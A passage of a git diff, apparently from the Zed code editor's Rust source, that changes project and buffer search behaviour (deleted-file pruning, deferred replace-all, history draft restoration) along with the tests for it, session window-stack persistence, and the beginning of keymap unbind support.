+ "cursor row {cursor_row:?} should be visible (scroll range {scroll_top}..{scroll_bottom})"
+ );
+ });
+ }
+
#[perf]
#[gpui::test]
async fn test_replace_simple(cx: &mut TestAppContext) {
@@ -3114,6 +3190,47 @@ mod tests {
.await;
}
+ #[gpui::test]
+ async fn test_deploy_replace_focuses_replacement_editor(cx: &mut TestAppContext) {
+ init_globals(cx);
+ let (editor, search_bar, cx) = init_test(cx);
+
+ editor.update_in(cx, |editor, window, cx| {
+ editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
+ s.select_display_ranges([
+ DisplayPoint::new(DisplayRow(0), 8)..DisplayPoint::new(DisplayRow(0), 16)
+ ])
+ });
+ });
+
+ search_bar.update_in(cx, |search_bar, window, cx| {
+ search_bar.deploy(
+ &Deploy {
+ focus: true,
+ replace_enabled: true,
+ selection_search_enabled: false,
+ },
+ window,
+ cx,
+ );
+ });
+ cx.run_until_parked();
+
+ search_bar.update_in(cx, |search_bar, window, cx| {
+ assert!(
+ search_bar
+ .replacement_editor
+ .focus_handle(cx)
+ .is_focused(window),
+ "replacement editor should be focused when deploying replace with a selection",
+ );
+ assert!(
+ !search_bar.query_editor.focus_handle(cx).is_focused(window),
+ "search editor should not be focused when replacement editor is focused",
+ );
+ });
+ }
+
#[perf]
#[gpui::test]
async fn test_find_matches_in_selections_singleton_buffer_multiple_selections(
@@ -4,15 +4,15 @@ use crate::{
ToggleCaseSensitive, ToggleIncludeIgnored, ToggleRegex, ToggleReplace, ToggleWholeWord,
buffer_search::Deploy,
search_bar::{
- ActionButtonState, alignment_element, input_base_styles, render_action_button,
- render_text_input,
+ ActionButtonState, HistoryNavigationDirection, alignment_element, input_base_styles,
+ render_action_button, render_text_input, should_navigate_history,
},
};
use anyhow::Context as _;
use collections::HashMap;
use editor::{
- Anchor, Editor, EditorEvent, EditorSettings, MAX_TAB_TITLE_LEN, MultiBuffer, PathKey,
- SelectionEffects,
+ Anchor, Editor, EditorEvent, EditorSettings, ExcerptId, MAX_TAB_TITLE_LEN, MultiBuffer,
+ PathKey, SelectionEffects,
actions::{Backtab, FoldAll, SelectAll, Tab, UnfoldAll},
items::active_match_index,
multibuffer_context_lines,
@@ -27,6 +27,7 @@ use gpui::{
use itertools::Itertools;
use language::{Buffer, Language};
use menu::Confirm;
+use multi_buffer;
use project::{
Project, ProjectPath, SearchResults,
search::{SearchInputKind, SearchQuery},
@@ -239,6 +240,7 @@ pub struct ProjectSearch {
search_history_cursor: SearchHistoryCursor,
search_included_history_cursor: SearchHistoryCursor,
search_excluded_history_cursor: SearchHistoryCursor,
+ _excerpts_subscription: Subscription,
}
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
@@ -264,6 +266,7 @@ pub struct ProjectSearchView {
excluded_files_editor: Entity<Editor>,
filters_enabled: bool,
replace_enabled: bool,
+ pending_replace_all: bool,
included_opened_only: bool,
regex_language: Option<Arc<Language>>,
_subscriptions: Vec<Subscription>,
@@ -283,10 +286,12 @@ pub struct ProjectSearchBar {
impl ProjectSearch {
pub fn new(project: Entity<Project>, cx: &mut Context<Self>) -> Self {
let capability = project.read(cx).capability();
+ let excerpts = cx.new(|_| MultiBuffer::new(capability));
+ let subscription = Self::subscribe_to_excerpts(&excerpts, cx);
Self {
project,
- excerpts: cx.new(|_| MultiBuffer::new(capability)),
+ excerpts,
pending_search: Default::default(),
match_ranges: Default::default(),
active_query: None,
@@ -297,27 +302,85 @@ impl ProjectSearch {
search_history_cursor: Default::default(),
search_included_history_cursor: Default::default(),
search_excluded_history_cursor: Default::default(),
+ _excerpts_subscription: subscription,
}
}
fn clone(&self, cx: &mut Context<Self>) -> Entity<Self> {
- cx.new(|cx| Self {
- project: self.project.clone(),
- excerpts: self
+ cx.new(|cx| {
+ let excerpts = self
.excerpts
- .update(cx, |excerpts, cx| cx.new(|cx| excerpts.clone(cx))),
- pending_search: Default::default(),
- match_ranges: self.match_ranges.clone(),
- active_query: self.active_query.clone(),
- last_search_query_text: self.last_search_query_text.clone(),
- search_id: self.search_id,
- no_results: self.no_results,
- limit_reached: self.limit_reached,
- search_history_cursor: self.search_history_cursor.clone(),
- search_included_history_cursor: self.search_included_history_cursor.clone(),
- search_excluded_history_cursor: self.search_excluded_history_cursor.clone(),
+ .update(cx, |excerpts, cx| cx.new(|cx| excerpts.clone(cx)));
+ let subscription = Self::subscribe_to_excerpts(&excerpts, cx);
+
+ Self {
+ project: self.project.clone(),
+ excerpts,
+ pending_search: Default::default(),
+ match_ranges: self.match_ranges.clone(),
+ active_query: self.active_query.clone(),
+ last_search_query_text: self.last_search_query_text.clone(),
+ search_id: self.search_id,
+ no_results: self.no_results,
+ limit_reached: self.limit_reached,
+ search_history_cursor: self.search_history_cursor.clone(),
+ search_included_history_cursor: self.search_included_history_cursor.clone(),
+ search_excluded_history_cursor: self.search_excluded_history_cursor.clone(),
+ _excerpts_subscription: subscription,
+ }
+ })
+ }
+ fn subscribe_to_excerpts(
+ excerpts: &Entity<MultiBuffer>,
+ cx: &mut Context<Self>,
+ ) -> Subscription {
+ cx.subscribe(excerpts, |this, _, event, cx| {
+ if matches!(event, multi_buffer::Event::FileHandleChanged) {
+ this.remove_deleted_buffers(cx);
+ }
})
}
+
+ fn remove_deleted_buffers(&mut self, cx: &mut Context<Self>) {
+ let (deleted_paths, removed_excerpt_ids) = {
+ let excerpts = self.excerpts.read(cx);
+ let deleted_paths: Vec<PathKey> = excerpts
+ .paths()
+ .filter(|path| {
+ excerpts.buffer_for_path(path, cx).is_some_and(|buffer| {
+ buffer
+ .read(cx)
+ .file()
+ .is_some_and(|file| file.disk_state().is_deleted())
+ })
+ })
+ .cloned()
+ .collect();
+
+ let removed_excerpt_ids: collections::HashSet<ExcerptId> = deleted_paths
+ .iter()
+ .flat_map(|path| excerpts.excerpts_for_path(path))
+ .collect();
+
+ (deleted_paths, removed_excerpt_ids)
+ };
+
+ if deleted_paths.is_empty() {
+ return;
+ }
+
+ self.excerpts.update(cx, |excerpts, cx| {
+ for path in deleted_paths {
+ excerpts.remove_excerpts_for_path(path, cx);
+ }
+ });
+
+ self.match_ranges
+ .retain(|range| !removed_excerpt_ids.contains(&range.start.excerpt_id));
+
+ cx.notify();
+ }
+
fn cursor(&self, kind: SearchInputKind) -> &SearchHistoryCursor {
match kind {
SearchInputKind::Query => &self.search_history_cursor,
@@ -735,6 +798,9 @@ impl ProjectSearchView {
}
fn replace_next(&mut self, _: &ReplaceNext, window: &mut Window, cx: &mut Context<Self>) {
+ if self.entity.read(cx).pending_search.is_some() {
+ return;
+ }
if let Some(last_search_query_text) = &self.entity.read(cx).last_search_query_text
&& self.query_editor.read(cx).text(cx) != *last_search_query_text
{
@@ -762,14 +828,24 @@ impl ProjectSearchView {
self.select_match(Direction::Next, window, cx)
}
}
+
fn replace_all(&mut self, _: &ReplaceAll, window: &mut Window, cx: &mut Context<Self>) {
- if let Some(last_search_query_text) = &self.entity.read(cx).last_search_query_text
- && self.query_editor.read(cx).text(cx) != *last_search_query_text
- {
- // search query has changed, restart search and bail
+ if self.entity.read(cx).pending_search.is_some() {
+ self.pending_replace_all = true;
+ return;
+ }
+ let query_text = self.query_editor.read(cx).text(cx);
+ let query_is_stale =
+ self.entity.read(cx).last_search_query_text.as_deref() != Some(query_text.as_str());
+ if query_is_stale {
+ self.pending_replace_all = true;
self.search(cx);
+ if self.entity.read(cx).pending_search.is_none() {
+ self.pending_replace_all = false;
+ }
return;
}
+ self.pending_replace_all = false;
if self.active_match_index.is_none() {
return;
}
@@ -858,7 +934,7 @@ impl ProjectSearchView {
}));
let query_editor = cx.new(|cx| {
- let mut editor = Editor::single_line(window, cx);
+ let mut editor = Editor::auto_height(1, 4, window, cx);
editor.set_placeholder_text("Search all files…", window, cx);
editor.set_text(query_text, window, cx);
editor
@@ -881,7 +957,7 @@ impl ProjectSearchView {
}),
);
let replacement_editor = cx.new(|cx| {
- let mut editor = Editor::single_line(window, cx);
+ let mut editor = Editor::auto_height(1, 4, window, cx);
editor.set_placeholder_text("Replace in project…", window, cx);
if let Some(text) = replacement_text {
editor.set_text(text, window, cx);
@@ -981,6 +1057,7 @@ impl ProjectSearchView {
excluded_files_editor,
filters_enabled,
replace_enabled: false,
+ pending_replace_all: false,
included_opened_only: false,
regex_language: None,
_subscriptions: subscriptions,
@@ -1474,8 +1551,9 @@ impl ProjectSearchView {
SearchInputKind::Exclude => &self.excluded_files_editor,
};
- editor.update(cx, |included_editor, cx| {
- included_editor.set_text(text, window, cx)
+ editor.update(cx, |editor, cx| {
+ editor.set_text(text, window, cx);
+ editor.request_autoscroll(Autoscroll::fit(), cx);
});
}
@@ -1521,6 +1599,10 @@ impl ProjectSearchView {
cx.emit(ViewEvent::UpdateTab);
cx.notify();
+
+ if self.pending_replace_all && self.entity.read(cx).pending_search.is_none() {
+ self.replace_all(&ReplaceAll, window, cx);
+ }
}
fn update_match_index(&mut self, cx: &mut Context<Self>) {
@@ -1583,9 +1665,7 @@ impl ProjectSearchView {
)
.child(
Button::new("filter-paths", "Include/exclude specific paths")
- .icon(IconName::Filter)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(Icon::new(IconName::Filter).size(IconSize::Small))
.key_binding(KeyBinding::for_action_in(&ToggleFilters, &focus_handle, cx))
.on_click(|_event, window, cx| {
window.dispatch_action(ToggleFilters.boxed_clone(), cx)
@@ -1593,9 +1673,7 @@ impl ProjectSearchView {
)
.child(
Button::new("find-replace", "Find and replace")
- .icon(IconName::Replace)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(Icon::new(IconName::Replace).size(IconSize::Small))
.key_binding(KeyBinding::for_action_in(&ToggleReplace, &focus_handle, cx))
.on_click(|_event, window, cx| {
window.dispatch_action(ToggleReplace.boxed_clone(), cx)
@@ -1603,9 +1681,7 @@ impl ProjectSearchView {
)
.child(
Button::new("regex", "Match with regex")
- .icon(IconName::Regex)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(Icon::new(IconName::Regex).size(IconSize::Small))
.key_binding(KeyBinding::for_action_in(&ToggleRegex, &focus_handle, cx))
.on_click(|_event, window, cx| {
window.dispatch_action(ToggleRegex.boxed_clone(), cx)
@@ -1613,9 +1689,7 @@ impl ProjectSearchView {
)
.child(
Button::new("match-case", "Match case")
- .icon(IconName::CaseSensitive)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(Icon::new(IconName::CaseSensitive).size(IconSize::Small))
.key_binding(KeyBinding::for_action_in(
&ToggleCaseSensitive,
&focus_handle,
@@ -1627,9 +1701,7 @@ impl ProjectSearchView {
)
.child(
Button::new("match-whole-words", "Match whole words")
- .icon(IconName::WholeWord)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(Icon::new(IconName::WholeWord).size(IconSize::Small))
.key_binding(KeyBinding::for_action_in(
&ToggleWholeWord,
&focus_handle,
@@ -1926,6 +1998,11 @@ impl ProjectSearchBar {
),
] {
if editor.focus_handle(cx).is_focused(window) {
+ if !should_navigate_history(&editor, HistoryNavigationDirection::Next, cx) {
+ cx.propagate();
+ return;
+ }
+
let new_query = search_view.entity.update(cx, |model, cx| {
let project = model.project.clone();
@@ -1935,13 +2012,14 @@ impl ProjectSearchBar {
.next(model.cursor_mut(kind))
.map(str::to_string)
}) {
- new_query
+ Some(new_query)
} else {
- model.cursor_mut(kind).reset();
- String::new()
+ model.cursor_mut(kind).take_draft()
}
});
- search_view.set_search_editor(kind, &new_query, window, cx);
+ if let Some(new_query) = new_query {
+ search_view.set_search_editor(kind, &new_query, window, cx);
+ }
}
}
});
@@ -1968,6 +2046,15 @@ impl ProjectSearchBar {
),
] {
if editor.focus_handle(cx).is_focused(window) {
+ if !should_navigate_history(
+ &editor,
+ HistoryNavigationDirection::Previous,
+ cx,
+ ) {
+ cx.propagate();
+ return;
+ }
+
if editor.read(cx).text(cx).is_empty()
&& let Some(new_query) = search_view
.entity
@@ -1982,12 +2069,13 @@ impl ProjectSearchBar {
return;
}
+ let current_query = editor.read(cx).text(cx);
if let Some(new_query) = search_view.entity.update(cx, |model, cx| {
let project = model.project.clone();
project.update(cx, |project, _| {
project
.search_history_mut(kind)
- .previous(model.cursor_mut(kind))
+ .previous(model.cursor_mut(kind), ¤t_query)
.map(str::to_string)
})
}) {
@@ -2086,7 +2174,11 @@ impl Render for ProjectSearchBar {
.on_action(
cx.listener(|this, action, window, cx| this.next_history_query(action, window, cx)),
)
- .child(render_text_input(&search.query_editor, color_override, cx))
+ .child(div().flex_1().py_1().child(render_text_input(
+ &search.query_editor,
+ color_override,
+ cx,
+ )))
.child(
h_flex()
.gap_1()
@@ -2244,18 +2336,22 @@ impl Render for ProjectSearchBar {
.child(mode_column);
let replace_line = search.replace_enabled.then(|| {
- let replace_column = input_base_styles(InputPanel::Replacement)
- .child(render_text_input(&search.replacement_editor, None, cx));
+ let replace_column = input_base_styles(InputPanel::Replacement).child(
+ div().flex_1().py_1().child(render_text_input(
+ &search.replacement_editor,
+ None,
+ cx,
+ )),
+ );
let focus_handle = search.replacement_editor.read(cx).focus_handle(cx);
-
let replace_actions = h_flex()
.min_w_64()
.gap_1()
.child(render_action_button(
"project-search-replace-button",
IconName::ReplaceNext,
- Default::default(),
+ is_search_underway.then_some(ActionButtonState::Disabled),
"Replace Next Match",
&ReplaceNext,
focus_handle.clone(),
@@ -2519,7 +2615,7 @@ pub mod tests {
use gpui::{Action, TestAppContext, VisualTestContext, WindowHandle};
use language::{FakeLspAdapter, rust_lang};
use pretty_assertions::assert_eq;
- use project::FakeFs;
+ use project::{FakeFs, Fs};
use serde_json::json;
use settings::{
InlayHintSettingsContent, SettingsStore, ThemeColorsContent, ThemeStyleContent,
@@ -3845,7 +3941,7 @@ pub mod tests {
})
.unwrap();
- // Next history query after the latest should set the query to the empty string.
+ // Next history query after the latest should preserve the current query.
window
.update(cx, |_, window, cx| {
search_bar.update(cx, |search_bar, cx| {
@@ -3857,7 +3953,10 @@ pub mod tests {
window
.update(cx, |_, _, cx| {
search_view.update(cx, |search_view, cx| {
- assert_eq!(search_view.query_editor.read(cx).text(cx), "");
+ assert_eq!(
+ search_view.query_editor.read(cx).text(cx),
+ "JUST_TEXT_INPUT"
+ );
assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE);
});
})
@@ -3873,13 +3972,16 @@ pub mod tests {
window
.update(cx, |_, _, cx| {
search_view.update(cx, |search_view, cx| {
- assert_eq!(search_view.query_editor.read(cx).text(cx), "");
+ assert_eq!(
+ search_view.query_editor.read(cx).text(cx),
+ "JUST_TEXT_INPUT"
+ );
assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE);
});
})
.unwrap();
- // First previous query for empty current query should set the query to the latest submitted one.
+ // Previous query should navigate backwards through history.
window
.update(cx, |_, window, cx| {
search_bar.update(cx, |search_bar, cx| {
@@ -3891,7 +3993,7 @@ pub mod tests {
window
.update(cx, |_, _, cx| {
search_view.update(cx, |search_view, cx| {
- assert_eq!(search_view.query_editor.read(cx).text(cx), "THREE");
+ assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO");
assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE);
});
})
@@ -3909,7 +4011,7 @@ pub mod tests {
window
.update(cx, |_, _, cx| {
search_view.update(cx, |search_view, cx| {
- assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO");
+ assert_eq!(search_view.query_editor.read(cx).text(cx), "ONE");
assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE);
});
})
@@ -4063,11 +4165,75 @@ pub mod tests {
window
.update(cx, |_, _, cx| {
search_view.update(cx, |search_view, cx| {
- assert_eq!(search_view.query_editor.read(cx).text(cx), "");
+ assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO_NEW");
assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE);
});
})
.unwrap();
+
+ // Typing text without running a search, then navigating history, should allow
+ // restoring the draft when pressing next past the end.
+ window
+ .update(cx, |_, window, cx| {
+ search_view.update(cx, |search_view, cx| {
+ search_view.query_editor.update(cx, |query_editor, cx| {
+ query_editor.set_text("unsaved draft", window, cx)
+ });
+ })
+ })
+ .unwrap();
+ cx.background_executor.run_until_parked();
+
+ // Navigate up into history — the draft should be stashed.
+ window
+ .update(cx, |_, window, cx| {
+ search_bar.update(cx, |search_bar, cx| {
+ search_bar.focus_search(window, cx);
+ search_bar.previous_history_query(&PreviousHistoryQuery, window, cx);
+ });
+ })
+ .unwrap();
+ window
+ .update(cx, |_, _, cx| {
+ search_view.update(cx, |search_view, cx| {
+ assert_eq!(search_view.query_editor.read(cx).text(cx), "THREE");
+ });
+ })
+ .unwrap();
+
+ // Navigate forward through history.
+ window
+ .update(cx, |_, window, cx| {
+ search_bar.update(cx, |search_bar, cx| {
+ search_bar.focus_search(window, cx);
+ search_bar.next_history_query(&NextHistoryQuery, window, cx);
+ });
+ })
+ .unwrap();
+ window
+ .update(cx, |_, _, cx| {
+ search_view.update(cx, |search_view, cx| {
+ assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO_NEW");
+ });
+ })
+ .unwrap();
+
+ // Navigate past the end — the draft should be restored.
+ window
+ .update(cx, |_, window, cx| {
+ search_bar.update(cx, |search_bar, cx| {
+ search_bar.focus_search(window, cx);
+ search_bar.next_history_query(&NextHistoryQuery, window, cx);
+ });
+ })
+ .unwrap();
+ window
+ .update(cx, |_, _, cx| {
+ search_view.update(cx, |search_view, cx| {
+ assert_eq!(search_view.query_editor.read(cx).text(cx), "unsaved draft");
+ });
+ })
+ .unwrap();
}
#[perf]
@@ -4253,9 +4419,6 @@ pub mod tests {
cx.background_executor.run_until_parked();
select_next_history_item(&search_bar_2, cx);
- assert_eq!(active_query(&search_view_2, cx), "");
-
- select_prev_history_item(&search_bar_2, cx);
assert_eq!(active_query(&search_view_2, cx), "THREE");
select_prev_history_item(&search_bar_2, cx);
@@ -4267,6 +4430,9 @@ pub mod tests {
select_prev_history_item(&search_bar_2, cx);
assert_eq!(active_query(&search_view_2, cx), "ONE");
+ select_prev_history_item(&search_bar_2, cx);
+ assert_eq!(active_query(&search_view_2, cx), "ONE");
+
// Search view 1 should now see the query from search view 2.
assert_eq!(active_query(&search_view_1, cx), "ONE");
@@ -4278,7 +4444,7 @@ pub mod tests {
assert_eq!(active_query(&search_view_2, cx), "THREE");
select_next_history_item(&search_bar_2, cx);
- assert_eq!(active_query(&search_view_2, cx), "");
+ assert_eq!(active_query(&search_view_2, cx), "THREE");
select_next_history_item(&search_bar_1, cx);
assert_eq!(active_query(&search_view_1, cx), "TWO");
@@ -4287,7 +4453,7 @@ pub mod tests {
assert_eq!(active_query(&search_view_1, cx), "THREE");
select_next_history_item(&search_bar_1, cx);
- assert_eq!(active_query(&search_view_1, cx), "");
+ assert_eq!(active_query(&search_view_1, cx), "THREE");
}
#[perf]
@@ -4887,6 +5053,91 @@ pub mod tests {
.unwrap();
}
+ #[gpui::test]
+ async fn test_deleted_file_removed_from_search_results(cx: &mut TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.background_executor.clone());
+ fs.insert_tree(
+ path!("/dir"),
+ json!({
+ "file_a.txt": "hello world",
+ "file_b.txt": "hello universe",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await;
+ let window =
+ cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let search = cx.new(|cx| ProjectSearch::new(project.clone(), cx));
+ let search_view = cx.add_window(|window, cx| {
+ ProjectSearchView::new(workspace.downgrade(), search.clone(), window, cx, None)
+ });
+
+ perform_search(search_view, "hello", cx);
+
+ search_view
+ .update(cx, |search_view, _window, cx| {
+ let match_count = search_view.entity.read(cx).match_ranges.len();
+ assert_eq!(match_count, 2, "Should have matches from both files");
+ })
+ .unwrap();
+
+ // Delete file_b.txt
+ fs.remove_file(
+ path!("/dir/file_b.txt").as_ref(),
+ fs::RemoveOptions::default(),
+ )
+ .await
+ .unwrap();
+ cx.run_until_parked();
+
+ // Verify deleted file's results are removed proactively
+ search_view
+ .update(cx, |search_view, _window, cx| {
+ let results_text = search_view
+ .results_editor
+ .update(cx, |editor, cx| editor.display_text(cx));
+ assert!(
+ !results_text.contains("universe"),
+ "Deleted file's content should be removed from results, got: {results_text}"
+ );
+ assert!(
+ results_text.contains("world"),
+ "Remaining file's content should still be present, got: {results_text}"
+ );
+ })
+ .unwrap();
+
+ // Re-run the search and verify deleted file stays gone
+ perform_search(search_view, "hello", cx);
+
+ search_view
+ .update(cx, |search_view, _window, cx| {
+ let results_text = search_view
+ .results_editor
+ .update(cx, |editor, cx| editor.display_text(cx));
+ assert!(
+ !results_text.contains("universe"),
+ "Deleted file should not reappear after re-search, got: {results_text}"
+ );
+ assert!(
+ results_text.contains("world"),
+ "Remaining file should still be found, got: {results_text}"
+ );
+ assert_eq!(
+ search_view.entity.read(cx).match_ranges.len(),
+ 1,
+ "Should only have match from the remaining file"
+ );
+ })
+ .unwrap();
+ }
+
fn init_test(cx: &mut TestAppContext) {
cx.update(|cx| {
let settings = SettingsStore::test(cx);
@@ -1,10 +1,37 @@
-use editor::{Editor, EditorElement, EditorStyle};
-use gpui::{Action, Entity, FocusHandle, Hsla, IntoElement, TextStyle};
+use editor::{Editor, EditorElement, EditorStyle, MultiBufferOffset, ToOffset};
+use gpui::{Action, App, Entity, FocusHandle, Hsla, IntoElement, TextStyle};
use settings::Settings;
use theme::ThemeSettings;
use ui::{IconButton, IconButtonShape};
use ui::{Tooltip, prelude::*};
+pub(super) enum HistoryNavigationDirection {
+ Previous,
+ Next,
+}
+
+pub(super) fn should_navigate_history(
+ editor: &Entity<Editor>,
+ direction: HistoryNavigationDirection,
+ cx: &App,
+) -> bool {
+ let editor_ref = editor.read(cx);
+ let snapshot = editor_ref.buffer().read(cx).snapshot(cx);
+ if snapshot.max_point().row == 0 {
+ return true;
+ }
+ let selections = editor_ref.selections.disjoint_anchors();
+ if let [selection] = selections {
+ let offset = selection.end.to_offset(&snapshot);
+ match direction {
+ HistoryNavigationDirection::Previous => offset == MultiBufferOffset(0),
+ HistoryNavigationDirection::Next => offset == snapshot.len(),
+ }
+ } else {
+ true
+ }
+}
+
pub(super) enum ActionButtonState {
Disabled,
Toggled,
@@ -43,7 +70,7 @@ pub(crate) fn input_base_styles(border_color: Hsla, map: impl FnOnce(Div) -> Div
h_flex()
.map(map)
.min_w_32()
- .h_8()
+ .min_h_8()
.pl_2()
.pr_1()
.border_1()
@@ -1,15 +1,20 @@
use editor::EditorSettings;
+use gpui::FocusHandle;
use settings::Settings as _;
use ui::{ButtonCommon, Clickable, Context, Render, Tooltip, Window, prelude::*};
use workspace::{ItemHandle, StatusItemView};
pub const SEARCH_ICON: IconName = IconName::MagnifyingGlass;
-pub struct SearchButton;
+pub struct SearchButton {
+ pane_item_focus_handle: Option<FocusHandle>,
+}
impl SearchButton {
pub fn new() -> Self {
- Self {}
+ Self {
+ pane_item_focus_handle: None,
+ }
}
}
@@ -21,11 +26,25 @@ impl Render for SearchButton {
return button.hidden();
}
+ let focus_handle = self.pane_item_focus_handle.clone();
button.child(
IconButton::new("project-search-indicator", SEARCH_ICON)
.icon_size(IconSize::Small)
- .tooltip(|_window, cx| {
- Tooltip::for_action("Project Search", &workspace::DeploySearch::default(), cx)
+ .tooltip(move |_window, cx| {
+ if let Some(focus_handle) = &focus_handle {
+ Tooltip::for_action_in(
+ "Project Search",
+ &workspace::DeploySearch::default(),
+ focus_handle,
+ cx,
+ )
+ } else {
+ Tooltip::for_action(
+ "Project Search",
+ &workspace::DeploySearch::default(),
+ cx,
+ )
+ }
})
.on_click(cx.listener(|_this, _, window, cx| {
window.dispatch_action(Box::new(workspace::DeploySearch::default()), cx);
@@ -37,9 +56,10 @@ impl Render for SearchButton {
impl StatusItemView for SearchButton {
fn set_active_pane_item(
&mut self,
- _active_pane_item: Option<&dyn ItemHandle>,
+ active_pane_item: Option<&dyn ItemHandle>,
_window: &mut Window,
- _cx: &mut Context<Self>,
+ cx: &mut Context<Self>,
) {
+ self.pane_item_focus_handle = active_pane_item.map(|item| item.item_focus_handle(cx));
}
}
@@ -1,4 +1,4 @@
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use gpui::{App, AppContext as _, Context, Subscription, Task, WindowId};
use util::ResultExt;
@@ -12,20 +12,19 @@ const SESSION_ID_KEY: &str = "session_id";
const SESSION_WINDOW_STACK_KEY: &str = "session_window_stack";
impl Session {
- pub async fn new(session_id: String) -> Self {
- let old_session_id = KEY_VALUE_STORE.read_kvp(SESSION_ID_KEY).ok().flatten();
+ pub async fn new(session_id: String, db: KeyValueStore) -> Self {
+ let old_session_id = db.read_kvp(SESSION_ID_KEY).ok().flatten();
- KEY_VALUE_STORE
- .write_kvp(SESSION_ID_KEY.to_string(), session_id.clone())
+ db.write_kvp(SESSION_ID_KEY.to_string(), session_id.clone())
.await
.log_err();
- let old_window_ids = KEY_VALUE_STORE
+ let old_window_ids = db
.read_kvp(SESSION_WINDOW_STACK_KEY)
.ok()
.flatten()
.and_then(|json| serde_json::from_str::<Vec<u64>>(&json).ok())
- .map(|vec| {
+ .map(|vec: Vec<u64>| {
vec.into_iter()
.map(WindowId::from)
.collect::<Vec<WindowId>>()
@@ -72,25 +71,28 @@ impl AppSession {
let _subscriptions = vec![cx.on_app_quit(Self::app_will_quit)];
#[cfg(not(any(test, feature = "test-support")))]
- let _serialization_task = cx.spawn(async move |_, cx| {
- // Disabled in tests: the infinite loop bypasses "parking forbidden" checks,
- // causing tests to hang instead of panicking.
- {
- let mut current_window_stack = Vec::new();
- loop {
- if let Some(windows) = cx.update(|cx| window_stack(cx))
- && windows != current_window_stack
- {
- store_window_stack(&windows).await;
- current_window_stack = windows;
+ let _serialization_task = {
+ let db = KeyValueStore::global(cx);
+ cx.spawn(async move |_, cx| {
+ // Disabled in tests: the infinite loop bypasses "parking forbidden" checks,
+ // causing tests to hang instead of panicking.
+ {
+ let mut current_window_stack = Vec::new();
+ loop {
+ if let Some(windows) = cx.update(|cx| window_stack(cx))
+ && windows != current_window_stack
+ {
+ store_window_stack(db.clone(), &windows).await;
+ current_window_stack = windows;
+ }
+
+ cx.background_executor()
+ .timer(std::time::Duration::from_millis(500))
+ .await;
}
-
- cx.background_executor()
- .timer(std::time::Duration::from_millis(500))
- .await;
}
- }
- });
+ })
+ };
#[cfg(any(test, feature = "test-support"))]
let _serialization_task = Task::ready(());
@@ -104,7 +106,8 @@ impl AppSession {
fn app_will_quit(&mut self, cx: &mut Context<Self>) -> Task<()> {
if let Some(window_stack) = window_stack(cx) {
- cx.background_spawn(async move { store_window_stack(&window_stack).await })
+ let db = KeyValueStore::global(cx);
+ cx.background_spawn(async move { store_window_stack(db, &window_stack).await })
} else {
Task::ready(())
}
@@ -137,10 +140,9 @@ fn window_stack(cx: &App) -> Option<Vec<u64>> {
)
}
-async fn store_window_stack(windows: &[u64]) {
+async fn store_window_stack(db: KeyValueStore, windows: &[u64]) {
if let Ok(window_ids_json) = serde_json::to_string(windows) {
- KEY_VALUE_STORE
- .write_kvp(SESSION_WINDOW_STACK_KEY.to_string(), window_ids_json)
+ db.write_kvp(SESSION_WINDOW_STACK_KEY.to_string(), window_ids_json)
.await
.log_err();
}
@@ -4,7 +4,7 @@ use fs::Fs;
use gpui::{
Action, ActionBuildError, App, InvalidKeystrokeError, KEYSTROKE_PARSE_EXPECTED_MESSAGE,
KeyBinding, KeyBindingContextPredicate, KeyBindingMetaIndex, KeybindingKeystroke, Keystroke,
- NoAction, SharedString, generate_list_of_all_registered_actions, register_action,
+ NoAction, SharedString, Unbind, generate_list_of_all_registered_actions, register_action,
};
use schemars::{JsonSchema, json_schema};
use serde::Deserialize;
@@ -73,6 +73,10 @@ pub struct KeymapSection {
/// on macOS. See the documentation for more details.
#[serde(default)]
use_key_equivalents: bool,
+ /// This keymap section's unbindings, as a JSON object mapping keystrokes to actions. These are
+ /// parsed before `bindings`, so bindings later in the same section can still take precedence.
+ #[serde(default)]
+ unbind: Option<IndexMap<String, UnbindTargetAction>>,
/// This keymap section's bindings, as a JSON object mapping keystrokes to actions. The
/// keystrokes key is a string representing a sequence of keystrokes to type, where the
/// keystrokes are separated by whitespace. Each keystroke is a sequence of modifiers (`ctrl`,
@@ -135,6 +139,20 @@ impl JsonSchema for KeymapAction {
}
}
+#[derive(Debug, Deserialize, Default, Clone)]
+#[serde(transparent)]
+pub struct UnbindTargetAction(Value);
+
+impl JsonSchema for UnbindTargetAction {
+ fn schema_name() -> Cow<'static, str> {
+ "UnbindTargetAction".into()
+ }
+
+ fn json_schema(_: &mut schemars::SchemaGenerator) -> schemars::Schema {
+ json_schema!(true)
+ }
+}
+
#[derive(Debug)]
#[must_use]
pub enum KeymapFileLoadResult {
@@ -231,6 +249,7 @@ impl KeymapFile {
for KeymapSection {
context,
use_key_equivalents,
+ unbind,
bindings,
unrecognized_fields,
} in keymap_file.0.iter()
@@ -244,7 +263,7 @@ impl KeymapFile {
// Leading space is to separate from the message indicating which section
// the error occurred in.
errors.push((
- context,
+ context.clone(),
format!(" Parse error in section `context` field: {}", err),
));
continue;
@@ -263,6 +282,38 @@ impl KeymapFile {
.unwrap();
}
+ if let Some(unbind) = unbind {
+ for (keystrokes, action) in unbind {
+ let result = Self::load_unbinding(
+ keystrokes,
+ action,
+ context_predicate.clone(),
+ *use_key_equivalents,
+ cx,
+ );
+ match result {
+ Ok(key_binding) => {
+ key_bindings.push(key_binding);
+ }
